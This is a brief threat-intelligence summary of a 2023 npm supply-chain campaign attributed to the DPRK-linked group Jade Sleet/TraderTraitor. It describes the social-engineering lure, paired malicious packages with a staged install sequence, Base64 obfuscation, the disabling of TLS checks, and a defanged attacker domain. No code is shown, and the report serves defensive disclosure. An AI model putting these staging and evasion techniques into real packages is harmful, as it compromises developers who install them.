Phylum linked a June 2023 npm supply-chain campaign to GitHub’s high-confidence attribution to Jade Sleet, also known as TraderTraitor, a group operating in support of North Korean objectives. The campaign targeted personal accounts of technology-firm employees through social engineering, inviting victims to collaborate on GitHub repositories that depended on malicious npm packages published by the actors. The packages were released in coordinated pairs and required a specific installation sequence to retrieve a token and download a final payload from actor-controlled infrastructure, limiting exposure to researchers. Phylum later found related packages using simple Base64 string obfuscation, including code that created an .electron cache directory, disabled TLS rejection, installed ffi-napi on macOS, and fetched data from npmaudit[.]com. The activity highlights how DPRK-linked actors can abuse trusted open-source workflows to reach cryptocurrency, blockchain, and technology targets through dependency execution rather than broad typosquatting.